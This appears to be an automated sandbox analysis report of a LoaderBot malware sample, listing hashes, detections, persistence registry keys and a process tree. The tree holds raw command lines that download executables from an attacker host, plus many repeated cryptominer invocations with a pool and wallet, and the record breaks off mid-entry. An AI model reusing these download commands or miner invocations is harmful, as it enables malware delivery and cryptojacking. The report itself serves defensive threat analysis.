loaderbot | 83ae57bdc0f817111ab909f54ec0f33b84f6504596d2a55adf39a16c5cf1afc0

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-en-20211208
submitted
12/01/2022, 07:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5263f286e45a03c8309fc8bb49e0f19a.exe
Size

349KB
MD5

5263f286e45a03c8309fc8bb49e0f19a
SHA1

a351cbd1c56f74115473c831442588653351231d
SHA256

83ae57bdc0f817111ab909f54ec0f33b84f6504596d2a55adf39a16c5cf1afc0
SHA512

e00f2adb5bdf172d73006a0d813fa4fdaf60f1900297a43393e9efc7c1187747e62babf6ff9ddafd019ecf306184b94fb1332313f00037f8dce447c41159c4f3

Score

10^/10

loaderbot mimikatz loader miner persistence upx

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

LoaderBot executable 3 IoCs

resource	yara_rule
behavioral1/memory/1780-98-0x00000000013B0000-0x000000000180B000-memory.dmp	loaderbot
behavioral1/memory/1780-110-0x00000000013B0000-0x000000000180B000-memory.dmp	loaderbot
behavioral1/memory/1780-111-0x00000000013B0000-0x000000000180B000-memory.dmp	loaderbot

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral1/memory/1216-138-0x00000000741E0000-0x0000000074218000-memory.dmp	mimikatz

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1628	WScript.exe
6	1628	WScript.exe

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

pid	Process
524	extd.exe
1488	extd.exe
1360	setup_c.exe
396	extd.exe
1216	setup_m.exe
1092	extd.exe
1780	setup_s.exe
1340	extd.exe
968	Driver.exe
1748	Driver.exe
1664	Driver.exe
1544	Driver.exe
1956	Driver.exe
912	Driver.exe
1092	Driver.exe
1720	Driver.exe
1884	Driver.exe
1580	Driver.exe
1392	Driver.exe
748	Driver.exe
568	Driver.exe
1396	Driver.exe
1580	Driver.exe
1916	Driver.exe
1744	Driver.exe
1064	Driver.exe
1920	Driver.exe
968	Driver.exe
320	Driver.exe
1208	Driver.exe
928	Driver.exe
1628	Driver.exe
1036	Driver.exe
1920	Driver.exe
1396	Driver.exe
1736	Driver.exe
1488	Driver.exe
912	Driver.exe
2012	Driver.exe
1340	Driver.exe
1568	Driver.exe
1416	Driver.exe
1144	Driver.exe
1620	Driver.exe
1816	Driver.exe
1684	Driver.exe
1588	Driver.exe
964	Driver.exe
980	Driver.exe
652	Driver.exe
1416	Driver.exe
836	Driver.exe
556	Driver.exe
1884	Driver.exe
280	Driver.exe
1040	Driver.exe
1568	Driver.exe
1328	Driver.exe
2008	Driver.exe
1004	Driver.exe
752	Driver.exe
1376	Driver.exe
1748	Driver.exe
2036	Driver.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000012284-58.dat	upx
behavioral1/files/0x0007000000012284-60.dat	upx
behavioral1/files/0x0007000000012284-66.dat	upx
behavioral1/files/0x0007000000012284-73.dat	upx
behavioral1/files/0x0007000000012284-80.dat	upx
behavioral1/files/0x0007000000012284-95.dat	upx

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	setup_s.exe

Loads dropped DLL 1 IoCs

pid	Process
1780	setup_s.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	setup_m.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_s.exe"	setup_s.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1216	setup_m.exe
1780	setup_s.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs

pid	Process
524	extd.exe
1488	extd.exe
1360	setup_c.exe
396	extd.exe
1216	setup_m.exe
1092	extd.exe
1780	setup_s.exe
1340	extd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1216	setup_m.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe
1780	setup_s.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1780	setup_s.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1780	setup_s.exe
Token: SeDebugPrivilege	1216	setup_m.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 1692	1620	5263f286e45a03c8309fc8bb49e0f19a.exe	28
PID 1620 wrote to memory of 1692	1620	5263f286e45a03c8309fc8bb49e0f19a.exe	28
PID 1620 wrote to memory of 1692	1620	5263f286e45a03c8309fc8bb49e0f19a.exe	28
PID 1620 wrote to memory of 1692	1620	5263f286e45a03c8309fc8bb49e0f19a.exe	28
PID 1692 wrote to memory of 524	1692	cmd.exe	29
PID 1692 wrote to memory of 524	1692	cmd.exe	29
PID 1692 wrote to memory of 524	1692	cmd.exe	29
PID 1692 wrote to memory of 524	1692	cmd.exe	29
PID 1692 wrote to memory of 1628	1692	cmd.exe	30
PID 1692 wrote to memory of 1628	1692	cmd.exe	30
PID 1692 wrote to memory of 1628	1692	cmd.exe	30
PID 1692 wrote to memory of 1488	1692	cmd.exe	31
PID 1692 wrote to memory of 1488	1692	cmd.exe	31
PID 1692 wrote to memory of 1488	1692	cmd.exe	31
PID 1692 wrote to memory of 1488	1692	cmd.exe	31
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 1360	1692	cmd.exe	32
PID 1692 wrote to memory of 396	1692	cmd.exe	33
PID 1692 wrote to memory of 396	1692	cmd.exe	33
PID 1692 wrote to memory of 396	1692	cmd.exe	33
PID 1692 wrote to memory of 396	1692	cmd.exe	33
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1216	1692	cmd.exe	34
PID 1692 wrote to memory of 1092	1692	cmd.exe	35
PID 1692 wrote to memory of 1092	1692	cmd.exe	35
PID 1692 wrote to memory of 1092	1692	cmd.exe	35
PID 1692 wrote to memory of 1092	1692	cmd.exe	35
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1780	1692	cmd.exe	36
PID 1692 wrote to memory of 1340	1692	cmd.exe	37
PID 1692 wrote to memory of 1340	1692	cmd.exe	37
PID 1692 wrote to memory of 1340	1692	cmd.exe	37
PID 1692 wrote to memory of 1340	1692	cmd.exe	37
PID 1780 wrote to memory of 968	1780	setup_s.exe	39
PID 1780 wrote to memory of 968	1780	setup_s.exe	39
PID 1780 wrote to memory of 968	1780	setup_s.exe	39
PID 1780 wrote to memory of 968	1780	setup_s.exe	39
PID 1780 wrote to memory of 1748	1780	setup_s.exe	41
PID 1780 wrote to memory of 1748	1780	setup_s.exe	41
PID 1780 wrote to memory of 1748	1780	setup_s.exe	41
PID 1780 wrote to memory of 1748	1780	setup_s.exe	41
PID 1780 wrote to memory of 1664	1780	setup_s.exe	43
PID 1780 wrote to memory of 1664	1780	setup_s.exe	43
PID 1780 wrote to memory of 1664	1780	setup_s.exe	43
PID 1780 wrote to memory of 1664	1780	setup_s.exe	43
PID 1780 wrote to memory of 1544	1780	setup_s.exe	45
PID 1780 wrote to memory of 1544	1780	setup_s.exe	45
PID 1780 wrote to memory of 1544	1780	setup_s.exe	45
PID 1780 wrote to memory of 1544	1780	setup_s.exe	45

C:\Users\Admin\AppData\Local\Temp\5263f286e45a03c8309fc8bb49e0f19a.exe
"C:\Users\Admin\AppData\Local\Temp\5263f286e45a03c8309fc8bb49e0f19a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\C14E.bat C:\Users\Admin\AppData\Local\Temp\5263f286e45a03c8309fc8bb49e0f19a.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:524
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7053\123.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:1628
- - C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1488
- - C:\Users\Admin\AppData\Local\Temp\7053\setup_c.exe
    setup_c.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1360
- - C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:396
- - C:\Users\Admin\AppData\Local\Temp\7053\setup_m.exe
    setup_m.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1216
- - C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1092
- - C:\Users\Admin\AppData\Local\Temp\7053\setup_s.exe
    setup_s.exe
    3⤵
    - Executes dropped EXE
    - Drops startup file
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:968
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1748
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1664
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1544
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1956
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:912
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1092
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1720
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1884
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1580
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1392
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:748
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1396
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1580
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1916
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1744
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1064
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1920
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:968
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:320
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1208
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:928
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1628
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1036
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1920
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1396
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1736
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1488
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:912
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:2012
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1340
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1416
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1144
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
